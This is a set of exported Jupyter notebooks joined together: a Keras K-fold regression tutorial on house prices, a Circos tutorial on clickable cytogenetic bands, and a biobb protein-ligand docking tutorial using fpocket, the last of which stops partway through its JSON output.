# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
我们的网络以单个单元结束,并且没有激活(即它是线性层)。这是一个典型的标量回归设置(即回归,我们试图预测一个连续的值)。应用激活函数将限制输出所能承受的范围;例如,如果我们将SigMod激活函数应用到我们的最后一层,网络只能学习预测0到1之间的值。这里,因为最后一层是纯线性的,网络可以自由地预测在任何范围内的值。注意,我们使用MSE损失函数(平均均方误差,预测和目标之间的差的平方)来编译网络,这是一个广泛用于回归问题的损失函数。我们也在训练期间监测新的度量:MAE,它代表平均绝对误差。它只是预测和目标之间的差异的绝对值。例如,在这个问题上,0.5的平均值将意味着我们的预测平均减少了500美元。 Validating our approach using K-fold validation为了在不断调整其参数(如训练的历元数)时评估我们的网络,我们可以简单地将数据分割成一个训练集和一个验证集,就像我们在前面的例子中所做的那样。然而,因为我们只有少量的数据点,验证集最终会非常小(例如大约100个例子)。结果是,我们的验证分数可能会发生很大的变化,这取决于我们选择哪些数据点用于验证,并且我们选择哪些训练点,即验证分数对于验证划分可能有很高的差异。这将阻止我们对我们的模型进行可靠的评估。在这种情况下,最好的做法是使用k-折叠交叉验证。它包括将可用的数据分割成k个分区(通常是k=4或5),然后实例化k个相同的模型,并在K-1分区上训练每一个,同时对剩余的分区进行评估。所使用的模型的验证分数将是获得的K验证分数的平均值。 In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
average_mae_history
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.figure(figsize=(12,5))
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.figure(figsize=(12,5))
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____ |
offline_analysis/Analysis_2737_LFP_position_stim_Jhan.ipynb | ###Markdown
Needs emk_neuro_analysis environment Loads LFP, camera tracking positions and DIO
###Code
import pandas as pd
import numpy as np
from pprint import pprint
from matplotlib import pyplot as plt
from emk_analysis import builder_experiment as bld_exp
from emk_neuro_analysis.lfp import iterator as lfp_iter
from emk_neuro_analysis.position import iterator as pos_iter
###Output
_____no_output_____
###Markdown
Experiment parameters
###Code
# name of experiment
experiment_name = '6082737'
experiment_phase = 'stim'
# data drive
data_disk = 'nvme0'
# directory with the preprocessed/extracted data files
dir_preprocess = f'/media/{data_disk}/Data/{experiment_name}/preprocessing/'
# Location of track config file.
# This is an excel spreadsheet that specifies the identities of the DIO for your experiment.
fname_config_track = (f'/media/{data_disk}/Data/{experiment_name}/config/Maze_S_Config.xlsx')
# Location of day records.
# This is an excel spreadsheet that lists details for each session on your experiment day.
dir_records = (f'/media/{data_disk}/Data/{experiment_name}/dayrecords/')
# chose the date - as a list
choose_dates = [ '20220425',]
# choose the epoch - as a list
epoch_list = [1,]
# choose the tetrodes - as a list
tet_list = [28, 27, 20, 19, 18, ]
###Output
_____no_output_____
###Markdown
Build day records from track confi file and experiment file
###Code
data_days = []
for curr_date in choose_dates:
fname_day_record = f'{dir_records}{curr_date}_{experiment_phase}_training_record.xlsx'
dict_sessions_day = bld_exp.build_day_from_file(experiment_name,
track_config_file=fname_config_track,
day_record_file=fname_day_record)
data_days.append(dict_sessions_day)
dict_sessions_all = bld_exp.build_all_sessions(data_days)
pprint(dict_sessions_all)
###Output
{'20220425_01': {'date': '20220425',
'description': 'maze stim',
'end': Timestamp('2022-04-25 23:55:00'),
'experiment': '6082737',
'id': 1,
'name': 'stim',
'start': Timestamp('2022-04-25 01:00:00'),
'tasks': {'Track 1': {'animal_id': 'clc',
'description': 'S',
'dio': {'10': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'11': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'6': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'7': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'8': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'9': {'bit': '_',
'notes': None,
'type': 'Unnamed:'},
'decision_pump': {'bit': 1,
'notes': None,
'type': 'out'},
'signal_pump': {'bit': 2,
'notes': None,
'type': 'out'},
'trigger_sensor': {'bit': 7,
'notes': None,
'type': 'in'}},
'notes': 'Closed loop'}}}}
###Markdown
Load LFP data
###Code
lfp_data, lfp_timestamp = lfp_iter.iterate_lfp_load(dir_preprocess,
tet_list,
choose_dates,
epoch_list=epoch_list,
remove_movement_artifact=True,
filter_linenoise=False,
print_debug=False)
###Output
/home/jaiyu/.conda/envs/emk_neuro_analysis/lib/python3.6/site-packages/rec_to_binaries/read_binaries.py:73: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
return np.dtype(typearr)
###Markdown
Load position data
###Code
# this specifies the zoom factor on the camera
# needs to be measured
# current setting of L17
cm_pix = {1: 0.3109,
2: 0.05310,
3: 0.3109,
4: 0.05310,
5: 0.3109,
6: 0.05310,
7: 0.3109,
}
df_pos = pos_iter.iterate_pos_load(dir_preprocess,
date_list=choose_dates,
epoch_list=epoch_list,
cm_pix=cm_pix,
print_debug=False)
###Output
1
Loaded /media/nvme0/Data/6082737/preprocessing/20220425/20220425_6082737_01_stim.1.pos
###Markdown
Plot LFP and speed
###Code
%matplotlib notebook
# sampling rate, convert raw timestamps to seconds on x-axis
fs = 30000
plt.figure()
# speed
plt.plot(df_pos.time/fs, df_pos.dxdydt_cm, zorder=-1, alpha=.4)
# position
plt.plot(df_pos.time/fs, df_pos.xloc_smooth/10, zorder=-1, alpha=.4)
for i, (k, v) in enumerate(lfp_data.items()):
for e in epoch_list:
plt.plot(np.array(lfp_timestamp.get(e))/fs, np.array(v.get(e))/1000+5*(i-10), lw=.15)
plt.xlabel('Time (s)')
plt.ylabel('Speed (cm/s)')
plt.tight_layout()
max(df_pos.xloc_smooth)-min(df_pos.xloc_smooth)
max(df_pos.yloc_smooth)-min(df_pos.yloc_smooth)
###Output
_____no_output_____ |
notebooks/ImageMaps_Part2.ipynb | ###Markdown
Part 2 of Image Maps: Image Maps - Clickable Cytogenetic BandsThis page is primarily based on the following page at the Circos documentation site:- [2. Image Maps - Clickable Cytogenetic Bands](????????????)That page is found as part number 4 of the ??? part ['Image Maps' section](http://circos.ca/documentation/tutorials/quick_start/) of [the larger set of Circos tutorials](http://circos.ca/documentation/tutorials/).Go back to Part 1 by clicking [here &8592;](ImageMaps_Part1.ipynb).----10 --- Image Maps=================2. Image Maps - Clickable Cytogenetic Bands-------------------------------------------::: {menu4}[[Lesson](/documentation/tutorials/image_maps/bands/lesson){.clean}]{.active}[Images](/documentation/tutorials/image_maps/bands/images){.normal}[Configuration](/documentation/tutorials/image_maps/bands/configuration){.normal}:::Chromosomes can have cytogenetic bands associated with them in thekaryotype file. These bands serve to define distinct regions on thechromosome. Typically, the bands are used to orient large-scalestructures (\>5Mb) on the chromosome and act as visual markers. You canuse these bands for any purpose, however.To associate a url with each band, use the `band_url` parameter in the[\]{.syn-block} block. ```iniband_url = script?start=[end]&end=[end]&label=[label]...``` parameters for bandsBands have the following parameters available automatically in their URL- chr - chromosome of band- parent - internal field- name - name of the band- start - base position of band start- end - base position of band end- size - size of band- color - color of band- label - the label of the band (this can be different than the name)Like for ideograms, you can include an `id` parameter in the banddefinition and use it subsequently in the URL. So, in the karyotype fileyou might have ```ini...band hs1 p31.2 p31.2 68700000 69500000 gnegband hs1 p31.1 p31.1 69500000 84700000 gpos100 id=treasure_hereband hs1 p22.3 p22.3 84700000 88100000 gneg...``` and then use a URL like ```iniband_url = script?id=[id]``` If you have image\_map\_missing\_parameter=removeparam, then all bandswithout a defined id parameter will have a URL like ```iniscript?id=``` with the exception of chr1p31.1 which will have ```iniscript?id=treasure_here``` But, if you define `image_map_missing_parameter=removeurl`, then onlybands with the id parameter defined will have a URL - other bands willnot have an entry in the image map. managing overlapping links - ideograms and bandsBands are drawn on top of ideograms and therefore band image mapelements locally override ideogram map elements. This is accomplished byplacing the band image map element before the ideogram element in themap file. Both elements are there, but [W3 specification for client-sideimagemaps](http://www.w3.org/TR/REC-html40/struct/objects.htmlh-13.6.1)specifies that \"If two or more defined regions overlap, theregion-defining element that appears earliest in the document takesprecedence (i.e., responds to user input)\".The second image in this tutorial demonstrates the result of definingboth an ideogram and a band url ```iniideogram_url = script?chr=[chr]band_url = script?start=[start]&end=[end]&label=[label]``` You\'ll notice that in the region of the ideogram band links are activein the image map. However, since the ideogram image map also includesthe label of the ideogram, you can still access the link of the ideogramthrough the label.In the case of bands without a URL, the ideogram link would be accesiblewithin the area of the band.---- Generating the plot produced by this example codeThe following two cells will generate the plot. The first cell adjusts the current working directory.
###Code
%cd ../circos-tutorials-0.67/tutorials/10/2/
%%bash
../../../../circos-0.69-6/bin/circos -conf circos.conf
###Output
debuggroup summary 0.38s welcome to circos v0.69-6 31 July 2017 on Perl 5.022000
debuggroup summary 0.39s current working directory /home/jovyan/circos-tutorials-0.67/tutorials/10/2
debuggroup summary 0.39s command ../../../../circos-0.69-6/bin/circos -conf circos.conf
debuggroup summary 0.39s loading configuration from file circos.conf
debuggroup summary 0.39s found conf file circos.conf
debuggroup summary 0.55s debug will appear for these features: output,summary
debuggroup summary 0.56s bitmap output image ./circos.png
debuggroup summary 0.56s SVG output image ./circos.svg
debuggroup summary 0.56s HTML map file ./circos.html
debuggroup summary 0.56s parsing karyotype and organizing ideograms
debuggroup summary 0.67s karyotype has 24 chromosomes of total size 3,080,419,504
debuggroup summary 0.68s applying global and local scaling
debuggroup summary 0.69s allocating image, colors and brushes
debuggroup summary 2.94s drawing 24 ideograms of total size 3,080,419,504
debuggroup summary 2.94s drawing highlights and ideograms
debuggroup output 5.63s generating output
debuggroup output 5.63s compiling image map
debuggroup output 5.71s created HTML image map at ./circos.html (202 kb)
debuggroup output 6.63s created PNG image ./circos.png (452 kb)
debuggroup output 6.63s created SVG image ./circos.svg (347 kb)
###Markdown
View the plot in this page using the following cell.
###Code
from IPython.display import Image
Image("circos.png")
###Output
_____no_output_____ |
biobb_wf_virtual-screening/html/fpocket/wf_vs_fpocket.web.ipynb | ###Markdown
Protein-ligand Docking tutorial using BioExcel Building Blocks (biobb) -- *Fpocket Version* --***This tutorial aims to illustrate the process of **protein-ligand docking**, step by step, using the **BioExcel Building Blocks library (biobb)**. The particular example used is the **Mitogen-activated protein kinase 14** (p38-α) protein (PDB code [3HEC](https://www.rcsb.org/structure/3HEC)), a well-known **Protein Kinase enzyme**, in complex with the FDA-approved **Imatinib**, (PDB Ligand code [STI](https://www.rcsb.org/ligand/STI), DrugBank Ligand Code [DB00619](https://go.drugbank.com/drugs/DB00619)), a small molecule **kinase inhibitor** used to treat certain types of **cancer**. The tutorial will guide you through the process of identifying the **active site cavity** (pocket) without previous knowledge, and the final prediction of the **protein-ligand complex**. Please note that **docking algorithms**, and in particular, **AutoDock Vina** program used in this tutorial, are **non-deterministic**. That means that results obtained when running the workflow **could be diferent** from the ones we obtained during the writing of this tutorial (see [AutoDock Vina manual](http://vina.scripps.edu/manual.html)). We invite you to try the docking process several times to verify this behaviour. ***Important: it is recommended to execute this tutorial step by step (not as a single workflow execution, Run All mode), as it has interactive selections. Settings Biobb modules used - [biobb_io](https://github.com/bioexcel/biobb_io): Tools to fetch biomolecular data from public databases. - [biobb_structure_utils](https://github.com/bioexcel/biobb_structure_utils): Tools to modify or extract information from a PDB structure file. - [biobb_chemistry](https://github.com/bioexcel/biobb_chemistry): Tools to perform chemoinformatics processes. - [biobb_vs](https://github.com/bioexcel/biobb_vs): Tools to perform virtual screening studies. Auxiliar libraries used - [nb_conda_kernels](https://github.com/Anaconda-Platform/nb_conda_kernels): Enables a Jupyter Notebook or JupyterLab application in one conda environment to access kernels for Python, R, and other languages found in other environments. - [nglview](http://nglviewer.org/nglview): Jupyter/IPython widget to interactively view molecular structures and trajectories in notebooks. - [ipywidgets](https://github.com/jupyter-widgets/ipywidgets): Interactive HTML widgets for Jupyter notebooks and the IPython kernel. Conda Installation and Launch```consolegit clone https://github.com/bioexcel/biobb_wf_virtual-screening.gitcd biobb_wf_virtual-screeningconda env create -f conda_env/environment.ymlconda activate biobb_VS_tutorialjupyter-nbextension enable --py --user widgetsnbextensionjupyter-nbextension enable --py --user nglviewjupyter-notebook biobb_wf_virtual-screening/notebooks/fpocket/wf_vs_fpocket.ipynb ``` *** Pipeline steps 1. [Input Parameters](input) 2. [Fetching PDB Structure](fetch) 3. [Extract Protein Structure](extractProtein) 4. [Computing Protein Cavities (fpocket)](fpocket) 5. [Filtering Protein Cavities (fpocket output)](fpocketFilter) 6. [Extract Pocket Cavity ](fpocketSelect) 7. [Generating Cavity Box ](cavityBox) 8. [Downloading Small Molecule](downloadSmallMolecule) 9. [Converting Small Molecule](sdf2pdb) 10. [Preparing Small Molecule (ligand) for Docking](ligand_pdb2pdbqt) 11. [Preparing Target Protein for Docking](protein_pdb2pdbqt) 12. [Running the Docking](docking) 13. [Extract a Docking Pose](extractPose) 14. [Converting Ligand Pose to PDB format](pdbqt2pdb) 15. [Superposing Ligand Pose to the Target Protein Structure](catPdb) 16. [Comparing final result with experimental structure](viewFinal) 17. [Questions & Comments](questions) ***<img src="https://bioexcel.eu/wp-content/uploads/2019/04/Bioexcell_logo_1080px_transp.png" alt="Bioexcel2 logo" title="Bioexcel2 logo" width="400" />*** Input parameters**Input parameters** needed: - **pdb_code**: PDB code of the experimental complex structure (if exists).In this particular example, the **p38α** structure in complex with the **Imatinib drug** was experimentally solved and deposited in the **PDB database** under the **3HEC** PDB code. The protein structure from this PDB file will be used as a **target protein** for the **docking process**, after stripping the **small molecule**. An **APO structure**, or any other structure from the **p38α** [cluster 100](https://www.rcsb.org/search?request=%7B%22query%22%3A%7B%22type%22%3A%22terminal%22%2C%22service%22%3A%22sequence%22%2C%22parameters%22%3A%7B%22target%22%3A%22pdb_protein_sequence%22%2C%22value%22%3A%22RPTFYRQELNKTIWEVPERYQNLSPVGSGAYGSVCAAFDTKTGLRVAVKKLSRPFQSIIHAKRTYRELRLLKHMKHENVIGLLDVFTPARSLEEFNDVYLVTHLMGADLNNIVKCQKLTDDHVQFLIYQILRGLKYIHSADIIHRDLKPSNLAVNEDCELKILDFGLARHTDDEMTGYVATRWYRAPEIMLNWMHYNQTVDIWSVGCIMAELLTGRTLFPGTDHIDQLKLILRLVGTPGAELLKKISSESARNYIQSLTQMPKMNFANVFIGANPLAVDLLEKMLVLDSDKRITAAQALAHAYFAQYHDPDDEPVADPYDQSFESRDLLIDEWKSLTYDEVISFVPPP%22%2C%22identity_cutoff%22%3A1%2C%22evalue_cutoff%22%3A0.1%7D%2C%22node_id%22%3A0%7D%2C%22return_type%22%3A%22polymer_entity%22%2C%22request_options%22%3A%7B%22pager%22%3A%7B%22start%22%3A0%2C%22rows%22%3A25%7D%2C%22scoring_strategy%22%3A%22combined%22%2C%22sort%22%3A%5B%7B%22sort_by%22%3A%22score%22%2C%22direction%22%3A%22desc%22%7D%5D%7D%2C%22request_info%22%3A%7B%22src%22%3A%22ui%22%2C%22query_id%22%3A%22bea5861f8b38a9e25a3e626b39d6bcbf%22%7D%7D) (sharing a 100% of sequence similarity with the **p38α** structure) could also be used as a **target protein**. This structure of the **protein-ligand complex** will be also used in the last step of the tutorial to check **how close** the resulting **docking pose** is from the known **experimental structure**. ----- - **ligandCode**: Ligand PDB code (3-letter code) for the small molecule (e.g. STI).In this particular example, the small molecule chosen for the tutorial is the FDA-approved drug **Imatinib** (PDB Code STI), a type of cancer growth blocker, used in [diferent types of leukemia](https://go.drugbank.com/drugs/DB00619). ----- - **pockets_dir**: Name of a folder to write temporary files.
###Code
import nglview
import ipywidgets
pdb_code = "3HEC" # P38 + Imatinib
ligand_code = "STI" # Imatinib
pockets_dir = "pockets"
###Output
_____no_output_____
###Markdown
*** Fetching PDB structureDownloading **PDB structure** with the **protein molecule** from the PDBe database.Alternatively, a **PDB file** can be used as starting structure. *****Building Blocks** used: - [Pdb](https://biobb-io.readthedocs.io/en/latest/api.htmlmodule-api.pdb) from **biobb_io.api.pdb*****
###Code
from biobb_io.api.pdb import pdb
download_pdb = "download.pdb"
prop = {
"pdb_code": pdb_code,
"filter": ["ATOM", "HETATM"]
}
pdb(output_pdb_path=download_pdb,
properties=prop)
###Output
2021-05-17 15:44:24,396 [MainThread ] [INFO ] Downloading: 3hec from: https://www.ebi.ac.uk/pdbe/entry-files/download/pdb3hec.ent
/anaconda3/envs/biobb_VS_tutorial/lib/python3.7/site-packages/urllib3/connectionpool.py:1020: InsecureRequestWarning: Unverified HTTPS request is being made to host 'www.ebi.ac.uk'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
InsecureRequestWarning,
2021-05-17 15:44:24,864 [MainThread ] [INFO ] Writting pdb to: download.pdb
2021-05-17 15:44:24,870 [MainThread ] [INFO ] Filtering lines NOT starting with one of these words: ['ATOM', 'HETATM']
###Markdown
Visualizing 3D structureVisualizing the downloaded/given **PDB structure** using **NGL**.Note (and try to identify) the **Imatinib small molecule (STI)** and the **detergent (β-octyl glucoside) (BOG)** used in the experimental reservoir solution to obtain the crystal.
###Code
view = nglview.show_structure_file(download_pdb, default=True)
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl1.png')
view
###Output
_____no_output_____
###Markdown
*** Extract Protein StructureExtract **protein structure** from the **downloaded PDB file**. Removing **any extra molecule** (ligands, ions, water molecules). The **protein structure** will be used as a **target** in the **protein-ligand docking process**. *****Building Blocks** used: - [extract_molecule](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlmodule-utils.extract_molecule) from **biobb_structure_utils.utils.extract_molecule*****
###Code
from biobb_structure_utils.utils.extract_molecule import extract_molecule
pdb_protein = "pdb_protein.pdb"
extract_molecule(input_structure_path=download_pdb,
output_molecule_path = pdb_protein)
###Output
2021-05-17 15:44:29,192 [MainThread ] [INFO ] Creating b33b03fe-5761-4996-beca-971e0ea316f5 temporary folder
2021-05-17 15:44:29,956 [MainThread ] [INFO ] check_structure -i /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/download.pdb -o pdb_protein.pdb --force_save --non_interactive command_list --list b33b03fe-5761-4996-beca-971e0ea316f5/extract_prot.lst
2021-05-17 15:44:29,958 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:44:29,959 [MainThread ] [INFO ] ===============================================================================
= BioBB structure checking utility v3.7.2 =
= A. Hospital, P. Andrio, J.L. Gelpi 2018-20 =
===============================================================================
Warning: sequence features only available in mmCIF format or with external fasta input
Structure /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/download.pdb loaded
Title:
Experimental method: unknown
Resolution: None A
Num. models: 1
Num. chains: 1 (A: Protein)
Num. residues: 420
Num. residues with ins. codes: 0
Num. HETATM residues: 91
Num. ligands or modified residues: 2
Num. water mol.: 89
Num. atoms: 2814
Small mol ligands found
STI A1
BOG A353
Step 1: ligands --remove All
Running ligands. Options: --remove All
2 Ligands detected
STI A1
BOG A353
Ligands removed All (2)
Step 2: water --remove Yes
Running water. Options: --remove Yes
89 Water molecules detected
89 Water molecules removed
Command list completed
Final Num. models: 1
Final Num. chains: 1 (A: Protein)
Final Num. residues: 329
Final Num. residues with ins. codes: 0
Final Num. HETATM residues: 0
Final Num. ligands or modified residues: 0
Final Num. water mol.: 0
Final Num. atoms: 2668
Structure saved on pdb_protein.pdb
2021-05-17 15:44:29,960 [MainThread ] [INFO ] Removing b33b03fe-5761-4996-beca-971e0ea316f5 temporary folder
###Markdown
Visualizing 3D structureVisualizing the downloaded/given **PDB structure** using **NGL**.Note that the **small molecules** included in the original structure are now gone. The new structure only contains the **protein molecule**, which will be used as a **target** for the **protein-ligand docking**.
###Code
view = nglview.show_structure_file(pdb_protein, default=False)
view.add_representation(repr_type='cartoon',
selection='not het',
colorScheme = 'atomindex')
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl2.png')
view
###Output
_____no_output_____
###Markdown
*** Computing Protein Cavities (fpocket)Computing the **protein cavities** (pockets) using the well-known [**fpocket**](https://bmcbioinformatics.biomedcentral.com/articles/10.1186/1471-2105-10-168) tool.These **cavities** will be then used in the **docking procedure** to try to find the **best region of the protein surface** where the small molecule can **bind**. Although in this particular example we already know the **binding site** region, as we started from a **protein-ligand complex** structure where the ligand was located in the same **binding site** as **Imatinib** is binding, this is not always the case. In the cases where we do not know these regions, **fpocket** will help us identifying the possible **binding sites** of our **target protein**.**fpocket** input parameters, such as **minimum** and **maximum radius** (in Angstroms) the alpha spheres might have in a **binding pocket** can be adjusted (min_radius, max_radius) . Parameters used in this particular example are 3Å for the **minimum radius** and 6Å for the **maximum radius**. The **minimum number of alpha spheres** a pocket must contain in order to figure in the results is also adjusted to 35. See the [fpocket manual](http://fpocket.sourceforge.net/manual_fpocket2.pdf) for more information. *****Building Blocks** used: - [fpocket_run](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_run) from **biobb_vs.fpocket.fpocket_run*****
###Code
from biobb_vs.fpocket.fpocket_run import fpocket_run
fpocket_all_pockets = "fpocket_all_pockets.zip"
fpocket_summary = "fpocket_summary.json"
prop = {
"min_radius": 3,
"max_radius": 6,
"num_spheres": 35
}
fpocket_run(input_pdb_path=pdb_protein,
output_pockets_zip = fpocket_all_pockets,
output_summary=fpocket_summary,
properties=prop)
###Output
_____no_output_____
###Markdown
Checking fpocket output (json)Checking the **fpocket** output from the **json file**. Every **pocket** has a separated entry in the json output, with information such as: **score, druggability score, volume, hydrophobicity, polarity or flexibility**.
###Code
import json
with open(fpocket_summary, 'r') as json_file:
data = json.load(json_file)
print(json.dumps(data, indent=4))
###Output
{
"pocket1": {
"score": 0.341,
"druggability_score": 0.876,
"number_of_alpha_spheres": 227,
"total_sasa": 357.1,
"polar_sasa": 93.837,
"apolar_sasa": 263.263,
"volume": 1486.347,
"mean_local_hydrophobic_density": 69.241,
"mean_alpha_sphere_radius": 3.576,
"mean_alp_sph_solvent_access": 0.445,
"apolar_alpha_sphere_proportion": 0.731,
"hydrophobicity_score": 33.129,
"volume_score": 4.258,
"polarity_score": 17,
"charge_score": 0,
"proportion_of_polar_atoms": 30.328,
"alpha_sphere_density": 8.901,
"cent_of_mass_alpha_sphere_max_dist": 24.197,
"flexibility": 0.62
},
"pocket14": {
"score": -0.129,
"druggability_score": 0.041,
"number_of_alpha_spheres": 61,
"total_sasa": 188.671,
"polar_sasa": 61.87,
"apolar_sasa": 126.801,
"volume": 539.674,
"mean_local_hydrophobic_density": 23.636,
"mean_alpha_sphere_radius": 3.61,
"mean_alp_sph_solvent_access": 0.429,
"apolar_alpha_sphere_proportion": 0.541,
"hydrophobicity_score": 14.438,
"volume_score": 4.562,
"polarity_score": 8,
"charge_score": 2,
"proportion_of_polar_atoms": 30.0,
"alpha_sphere_density": 5.224,
"cent_of_mass_alpha_sphere_max_dist": 12.921,
"flexibility": 0.401
},
"pocket6": {
"score": 0.064,
"druggability_score": 0.028,
"number_of_alpha_spheres": 253,
"total_sasa": 525.65,
"polar_sasa": 149.84,
"apolar_sasa": 375.81,
"volume": 1898.144,
"mean_local_hydrophobic_density": 43.179,
"mean_alpha_sphere_radius": 3.676,
"mean_alp_sph_solvent_access": 0.507,
"apolar_alpha_sphere_proportion": 0.617,
"hydrophobicity_score": 36.767,
"volume_score": 4.256,
"polarity_score": 17,
"charge_score": 8,
"proportion_of_polar_atoms": 33.103,
"alpha_sphere_density": 10.64,
"cent_of_mass_alpha_sphere_max_dist": 26.572,
"flexibility": 0.403
},
"pocket3": {
"score": 0.223,
"druggability_score": 0.017,
"number_of_alpha_spheres": 36,
"total_sasa": 73.903,
"polar_sasa": 30.111,
"apolar_sasa": 43.791,
"volume": 288.593,
"mean_local_hydrophobic_density": 17.143,
"mean_alpha_sphere_radius": 3.514,
"mean_alp_sph_solvent_access": 0.47,
"apolar_alpha_sphere_proportion": 0.583,
"hydrophobicity_score": 41.25,
"volume_score": 3.75,
"polarity_score": 4,
"charge_score": 0,
"proportion_of_polar_atoms": 27.586,
"alpha_sphere_density": 5.179,
"cent_of_mass_alpha_sphere_max_dist": 11.603,
"flexibility": 0.658
},
"pocket4": {
"score": 0.196,
"druggability_score": 0.006,
"number_of_alpha_spheres": 41,
"total_sasa": 100.284,
"polar_sasa": 42.318,
"apolar_sasa": 57.966,
"volume": 417.123,
